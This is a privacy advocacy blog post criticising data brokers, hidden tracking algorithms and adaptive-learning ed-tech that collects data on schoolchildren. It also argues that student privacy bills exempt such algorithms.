Share and Enjoy

  • Facebook
  • Twitter
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS


bigdata schools

Your internet searches say a lot about you (or your children) and it might not be all good, or even accurate. The information collected by hidden algorithms is not limited to what you search for, it’s everything you do on the computer:  what you type, how fast you type, your emotions, (even keystrokes can apparently detect emotion), how slow she reads, how poorly he spells, or if he is faking having ADHD, and let’s not forget data badges.

This Good Morning America Investigates segment shows that a simple internet search for medical symptoms or hay fever,  can land your name, your address and more on a list as having heart disease or incorrectly list you as an asthma sufferer. Every internet search, everything you do online, can be tracked by companies using computer programs, as explained in this piece by 60 MinutesThe Data Brokers.


Personal information about you can be gathered by a computer algorithm, be further analyzed, packaged by data brokers and sold to different markets. Lists can be sold to drug companies, insurance companies, possible employers, colleges, literally anyone with an interest. Are you wondering what lists you are on? Wondering whether your data on these lists are accurate or wondering how that data are being used? You should be curious and concerned because data algorithms can be biased; data can be wrong and passive data collecting algorithms seem to be everywhere, including schools, but no one can see them.


Facebook claims to know your posture, can map your face, and claims it can recognize you from the back of your head. Facebook also reportedly has a patent for technology that could potentially be used for evaluating your credit risk, which they say could be used to view your social network connections and determine your credit worthiness.  (So, who you are friends with on Facebook could affect your credit score?!) Wow.  This sounds incredibly similar to what is already happening in China:


In China, every citizen is being assigned a credit score that drops if a person buys and plays video games, or posts political comments online “without prior permission,” or even if social media “friends” do so. The ACLU said the credit rating system, an Orwellian nightmare, should serve as a warning to Americans.–ACLU


Not to unfairly single out Facebook, others have been questioned about their data gathering technology. Consider Pearson’s Quotient that  tracks children’s micro-movements and can detect ADHD or what Pearson calls  “ADHD fakers”.   There’s also Microsoft’s Cortana that has voice recording and facial recognition, and then there’s Google’s microphone can record your voice unless disabled. TIME Magazine recently called out Google for its voice recording feature, saying “This is not OK Google.”

School:  Is personalized learning getting too personal?

Let’s switch gears and talk about the astonishing amount of data being collected on school children,  much of it generated and collected while students are online. There is huge push for innovation and machine learning  in education, moving all curriculum and testing to computers, online, rather than traditional text books and paper pencil.

When computers “teach” your child, the online algorithms can gather millions of data points about your child.  Maybe the hidden computer programs should be called something  like “Robot Teaching”, or maybe “Vulcan Mind-Melding”, if you are Star Trek fan.mind meld learning

Algorithms: While the student is learning online,  the computer is also learning about the student. 

The ed-tech industry is calling this  form of student data tracking  ” personalized learning ” or adaptive, customized, education because of the algorithms that will be used to discover how a student thinks and feels and learns while online. Personalized learning can collect literally millions of data points per day, per child.

Parents are concerned because children are increasingly required to use computers at school while the unknown data collection goes unchecked.  Nearly every state has passed (or is proposing) some form of data privacy legislation to protect students. But those companies taking the data, the very wealthy, powerful, big companies, spend lots of money, even send lobbyists and representatives (like this Google Rep) to draft or weaken or outright oppose the bills.


Are legislators ignoring algorithms? Who are they protecting?

One has to wonder WHY nearly every data student privacy bill being passed comes with language that resembles this exemption for algorithms, found in Jeb Bush’s   Foundation for Excellence in Education model student privacy legislation:

jeb model bill underline

There’s that phrase again–adaptive learning–and most student privacy laws don’t cover it.

There are no laws prohibiting adaptive learning algorithms  and no laws requiring the companies to disclose what the algorithms are collecting.  Why bother writing a privacy bill that doesn’t protect privacy? The word oxymoron comes to mind. How can educators or legislators promote a student privacy bill that in fact exempts any and all unknown data mining algorithms? That is like an auto insurance company covering all accidents that don’t involve an automobile.


Even Microsoft acknowledges the problems with taking students’ data and so called “anonymous” algorithms:

“The question of whether a specific piece of student data is considered “PII” from an “education record” protected by FERPA short circuits some critical discussion about what technologies are in use in schools and what information they collect, or are capable of collecting.  It also potentially sidelines an important discussion about whether we care about large amounts of aggregated information that might not be “personally identifiable” under FERPA, but can still generate student privacy concerns. As two notable privacy researchers have highlighted, companies can use sophisticated data analytics tools to “anonymously” data mine customer documents or emails and then use the resulting information for a range of purposes, including building advertising profiles.” -Microsoft

So with that statement, SURELY, Microsoft wouldn’t support exempting these sophisticated analytical algorithms that “anonymously” take student data, right, Microsoft?

Testing and curriculum companies are making Billions from the sale of mandated online standardized tests like these mentioned in the video: Last Week Tonight with John Oliver: Standardized Testing.

Maybe someone will ask the incredibly clever and humorous John Oliver to do a follow up on what ‘computer things’ are doing to kids.

john oliver picIf John Oliver thought the tremendous pressure of standardized testing in itself was ridiculous, one has to wonder what he would say about the unknown algorithms, #RobotTeaching, and childhood data being collected, experimented, and marketed without parents even knowing.  @iamjohnoliver what do you say?


Cheri Kiesecker